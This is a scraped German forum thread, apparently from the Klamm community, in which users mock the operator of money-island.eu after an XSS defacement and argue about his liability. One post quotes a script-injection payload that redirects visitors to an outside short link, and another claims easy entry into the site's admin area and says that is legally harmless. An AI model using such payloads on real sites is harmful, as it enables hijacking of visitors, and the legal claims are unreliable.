Batsman
Individualist
- 20 April 2006
- 584
- 39
Dem kann man nur uneingeschränkt zustimmen.Eigentlich ist doch noch gar nicht Freitag![]()
Follow along with the video below to see how to install our site as a web app on your home screen.
Anmerkung: This feature may not be available in some browsers.
Dem kann man nur uneingeschränkt zustimmen.Eigentlich ist doch noch gar nicht Freitag![]()
Du bist ein extrem witziges Kerlchen, sowas braucht Klamm. Mach weiter so.
Verschwörertheorie: Ich glaube ja inzwichen, dass die Mods und Admins das selbst sind.![]()

Und es zeigt sich: du hast Recht
Na gut, dann ist für mich die ernsthafte Diskussion hier auch beendet und ich lach ein bisschen money-island.eu aus, macht eh mehr Spaß.

Die Tatsache, dasss es sogar ein Möchtegern Hacker schafft, deine Seite abkacken zu lassen, zeigt, wie gut du programmirst...
<script>location.href='https://rurl.de/53a'</script>

So, ich war jetzt, nachdem du mich selbst mit diesem thread darauf aufmerksam gemacht hast, in deinem "Adminbereich", aber das hat nichts mit hacken oder Scripten zu tun, da wär selbst meine Mutter hin gekommen und hätte sich gefragt wieso.
Ich glaube zu wissen dass niemand rechtlich belangt werden kann wenn er ohne grosse Anstrengungen eine derart pseudo-abgesicherte Seite aufrufen kann, vielleicht ist jemand hier der genaueres dazu sagen kann und sogar ein paar Paragraphen oder Präzedenzfälle parat hat??

Sag mal, hast du deine Blödheit irgendwo erlernt ?
Schreib dich nicht ab, lerne Threads lesen
Wie hohl ihr doch seid, zeigen wohl eure Antworten, eigentlich habt ihr hier garnichts geschanallt, wollt aber mal irgendwelche dünne Suppe unters Volk mischen.......ich überweise jeden Idioten hier 1 Los, dann hat er wenigstens 1 x Spass im Leben......
Wenn du gerade von XSS und JS redest ... myvideo ist da auch ganz groß dabei
XSS-Demo auf myvideo.de

*lol*, wasn das fürn Scheiß FF 2.0.0.3 hängt sich bei mir auf, son fuch![]()
Bei einer alert-box? Daran alleine wird´s wohl nicht liegen![]()
Ein Kunde köönte money sogar verklagen, wenn er soetwas verkauft bekäme, denn dieser "Bug" zählt als grobe Fahrlässigkeit und somit haftet der Programmierer für jeglichen entstanden Schaden + sonstige Ansprüche.
Und ne Klage deswegen? *gg*
Schlaf dich lieber nochmal aus, du machst dich lächerlich![]()

PS: Lest mal die News auf seiner Seite. Ein Klamm-User "Tester" wird beschuldigt...
...bevor wir Rechtliche Schritte gegen euch einleiten.